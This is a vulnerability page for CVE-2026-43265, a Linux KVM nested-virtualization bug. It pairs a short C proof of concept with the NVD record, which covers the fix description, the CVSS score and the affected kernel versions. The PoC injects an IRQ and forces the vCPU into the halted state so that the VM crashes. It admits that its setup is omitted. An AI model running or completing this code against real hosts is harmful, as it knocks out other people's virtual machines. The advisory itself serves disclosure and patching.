CVE-2026-43265

/* * Conceptual Proof of Concept for CVE-2026-43265 * This PoC demonstrates how a userspace VMM might trigger the * impossible state (blocking with injected event) in KVM. * Requires root access and KVM enabled. */ #include <linux/kvm.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <stdio.h> #include <stdlib.h> int main() { int kvm_fd, vm_fd, vcpu_fd; struct kvm_mp_state mp_state; struct kvm_interrupt irq; // 1. Open KVM device kvm_fd = open("/dev/kvm", O_RDWR); if (kvm_fd < 0) { perror("open /dev/kvm"); return -1; } // 2. Create VM and VCPU vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0); vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0); // (Simplification: Setup real mode and nested virtualization L2 here) // Assume setup code enables nested virtualization (L2) and runs L2. // 3. Inject an event (e.g., IRQ) while L2 is active irq.irq = 1; if (ioctl(vcpu_fd, KVM_INTERRUPT, &irq) < 0) { perror("KVM_INTERRUPT"); } // 4. Force vCPU into HALTED state (MP_STATE_HALTED) with event pending // This creates the "impossible state" mentioned in the CVE description. mp_state.mp_state = KVM_MP_STATE_HALTED; if (ioctl(vcpu_fd, KVM_SET_MP_STATE, &mp_state) < 0) { perror("KVM_SET_MP_STATE"); } // 5. Run VCPU // On systems vulnerable to CVE-2026-43265, exiting the block might // generate a spurious exit or crash the VM. while (1) { if (ioctl(vcpu_fd, KVM_RUN, NULL) < 0) { perror("KVM_RUN - VM likely crashed or exited unexpectedly"); break; } } close(vcpu_fd); close(vm_fd); close(kvm_fd); return 0; }

{"cve": {"id": "CVE-2026-43265", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:47.510", "lastModified": "2026-05-08T20:33:43.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86: Ignore -EBUSY when checking nested events from vcpu_block()\n\nIgnore -EBUSY when checking nested events after exiting a blocking state\nwhile L2 is active, as exiting to userspace will generate a spurious\nuserspace exit, usually with KVM_EXIT_UNKNOWN, and likely lead to the VM's\ndemise. Continuing with the wakeup isn't perfect either, as *something*\nhas gone sideways if a vCPU is awakened in L2 with an injected event (or\nworse, a nested run pending), but continuing on gives the VM a decent\nchance of surviving without any major side effects.\n\nAs explained in the Fixes commits, it _should_ be impossible for a vCPU to\nbe put into a blocking state with an already-injected event (exception,\nIRQ, or NMI). Unfortunately, userspace can stuff MP_STATE and/or injected\nevents, and thus put the vCPU into what should be an impossible state.\n\nDon't bother trying to preserve the WARN, e.g. with an anti-syzkaller\nKconfig, as WARNs can (hopefully) be added in paths where _KVM_ would be\nviolating x86 architecture, e.g. by WARNing if KVM attempts to inject an\nexception or interrupt while the vCPU isn't running."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.167", "matchCriteriaId": "C54AECAF-D924-45D0-89E2-77D4D1CC2E8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1c957773063ed3264953597e32990a748381caf6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1e88b5f854bdb469424132e0bb44793ad7a7c20a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2657439265d34a911886b916ba8be97ecc117d51", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/78265cd066d73a5cb41c088fcae4a2515e480d97", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ead63640d4e72e6f6d464f4e31f7fecb79af8869", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ec3be7dc9391085a2d96700e159d66d1328b7ff6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}